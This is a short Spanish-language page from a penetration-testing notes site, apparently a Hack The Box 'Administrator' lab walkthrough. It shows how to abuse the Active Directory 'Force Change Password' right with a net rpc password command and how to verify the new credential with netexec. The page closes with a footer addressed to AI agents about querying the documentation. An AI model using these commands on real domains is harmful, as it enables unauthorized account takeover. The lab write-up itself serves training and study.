# Force Change Password

Ahora tenemos el derecho **Force Change Password** frente al usuario Benjamin

<figure><img src="/files/1eOH6CYqDJW6GJDYGXDw" alt=""><figcaption></figcaption></figure>

Vemos como podemos abusar con Linux.

<figure><img src="/files/NJejxqKqNzUyqFbpaHf9" alt=""><figcaption></figcaption></figure>

```
net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"newP@ssword2022" -S 10.10.11.42
```

<figure><img src="/files/YxjJBh3RXPaar7sbfQ3J" alt=""><figcaption></figcaption></figure>

Lo hacemos pero aún así no podemos acceder vía WinRM. De todas formas se puede comprobar si la credencial es válida.

```
netexec smb 10.10.11.42 -u benjamin -p "newP@ssword2022"
```

<figure><img src="/files/n4XqTTs7yZ9EM7usQcUK" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alv-fh.gitbook.io/alv-fh/windows-privilege-escalation/force-change-password.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
